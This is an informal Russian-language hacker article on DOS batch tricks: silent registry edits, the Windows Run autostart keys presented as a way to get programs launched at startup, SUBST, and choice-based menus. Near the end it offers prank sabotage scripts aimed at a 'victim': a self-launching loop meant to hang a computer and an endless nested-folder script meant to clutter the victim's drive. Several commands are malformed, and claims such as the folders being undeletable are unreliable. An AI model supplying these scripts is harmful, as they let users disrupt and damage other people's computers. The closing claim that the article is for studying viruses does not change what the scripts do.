Привет тебе снова юный хокер. В этой статье я буду рассказывать про новые фишки с (ДОС — дисковая операционная система). Эта статья рассчитана на чела, который уже знаком с спецификацией ДОС. Если не знакомы то я не виноват, самим надо учить.

Дело было вечером, делать было нечего и я взялся за эту статью хоть и впадлу. Итак, начнем, пожалуй, с реестра. А точнее — добавлению в него ключей.

regedit /s file.reg — добавить ключи в реестр из файла, без вопросов

Но файл нужно создать, а потом добавить, сделаем это вот так:

echo REGEDIT4 > file.reg
echo я >> file.reg
echo >>[HKEY_CURRENT_USER\Software\Valve\Half-Life\Settings] >> file.reg
echo >>»Key»=»3928841909592″ >>file.reg
regedit /s file.reg

Этот скрипт добавляет ключ в реестр :) Сначала создаем файл а потом добавляем его в реестр. Вписать в него можно много всего хорошего и, например:

«ftplocpatch»=»ftp://ftp.cuteftp.com/update/cuteftp»
«Key1″=hex:41,36,42,33,34,35,36,38,6b,32,77,63,32,33,00
«RegUserName»=»iND»
«CmdLine»=»C:\\PROGRA~1\\GlobalSCAPE\\CuteFTP\\Cutftp32.exe»
«Shell Integration»=»1»
«handlerRequired»=dword:00000001
«DefaultHandler»=»MSDFMAP.Handler»
«ThreadingModel»=»Apartment»

Это просто примеры и на низ внимания не обращайте.

Или таким способом:

HKEY_CLASSES_ROOT\Photoshop.Image.6\shellex = — Опустошаем параметр
HKEY_CLASSES_ROOT\Photoshop.Image.6\shellex = 1 — Присваиваем значение «1»

А в этом скрипте уже указано, куда добавить ключ из файла:

regedit /e Win.reg «HKEY_CURRENT_USER\Software\WinOrganizer»

А это места которые запускаются при автозапуске

HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\RunServices
HKEY_USERS\.DEFAULT\Software\ Microsoft\Windows\CurrentVersion\Run

Вот такими способами можно дописаться в реестр на выполнение или работу! И с помощью реестра можно сделать много.
Теперь расскажу про программу SUBST, она сопоставляет заданному пути имя диска.

SUBST [диск1: [диск2:]путь]
SUBST диск1: /D

диск1: Виртуальный диск, который сопоставляется указанному пути.
[диск2:]путь Физические диск и путь,
которым сопоставляется виртуальный диск.
/D Удаление ранее созданного виртуального диска.

Ввод SUBST без параметров позволяет вывести текущий список виртуальных дисков

Например, subst g: c:\folder это, значит, создать виртуальный диск g: из папки c:\folder…
Да простят меня за тырр, но идея взята с другой статьи:

Будем создавать меню с помощью всё тех же досовских команд. Для этого нам понадобится конструкция choice. Чтобы было понятней разберём пример:

echo S — Start program.
echo H — Help.
echo E — Exit program
choice /c:SHE Push one of this keys
if errorlevel 3 goto exit
if errorlevel 2 goto help
if errorlevel 1 goto start

После запуска этого скрипта перед тобой появятся первые три строчки, а под ними предложение нажать на одну из предложенных клавиш (S,H и E). После нажатия на одну из них, переменной errorlevel присвоится номер выбранной клавиши. Как узнать номер?
Посмотри сюда:
choice /c:SHE

Здесь SHE это три клавиши, на которые можно нажать. S по счёту 1ая, H 2ая, E соответственно 3я. Вот по такому порядку им присваивается номер. Теперь вернёмся к нашему скрипту. При нажатии на кнопку H, к примеру, переменная errorlevel примет значение 2 (так как H 2ая по порядку), далее с помощью условного оператора (if) скрипт проверяет содержание этой переменной. В нашем случае errorlevel = 2. Поэтому скрипт выполнит последующую команду goto help (перескочит на метку help).
Чёнить понял? Хммм..хренова. Введи с командной строки choice /?. И мож чё поймёшь =).
Основная часть кончилась, так что если всё понял, можешь читать дальше.
Если тебе не нужна менюшка, а просто выбор yes\no, используй choice без параметра /c. В этом случае при нажатии на Y переменной errorlevel присвоится значение 1, а при нажатии на N соответственно 2.
Если тебе нужно, чтоб выбор клавиш не отображался, используй флаг /n.
/T:%ответ%,%время_в_сек% — если по истечению указанного времени юзер не нажал одну из требуемых клавиш, скрипт сам выберет ту, которая прописана на месте слова «%ответ%».

Однажды когда мы писали с другом приколы, в башку пришла абалденная идея, повесть компьютер. Это пишется в три строчки!

:a
start %0
goto a

Этот скрипт начнет неистово сам себя запускать и комп завсинет! ;)
А следующий скрипт создает очень много папок в другой папке. Забить эти папки легче всего.

cd\
md 1
:a
md 1
cd 1
goto a
:: Создает на диске C: 121 подкаталог!
:: Можно дописать и создание файла внутри!

Этот скрипт создаст кучу файлов на диске c:\ и в папках 1\1\1\1\1\1\1 и,т,д И такая папка застрянет на винчестере жертвы до первого форматирования. Сам проверял. Ни через дос ни через что их удалить не получится!
А проблема в том, что при наведении курсором на них Explorer вылетает. И это не предел ты можешь сам модернизировать такой скрипт и сделать все, что только можно и нельзя.

Ну, вот пока и все, будут появляться новые идеи, напишу. Следите за обновлениями.

Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.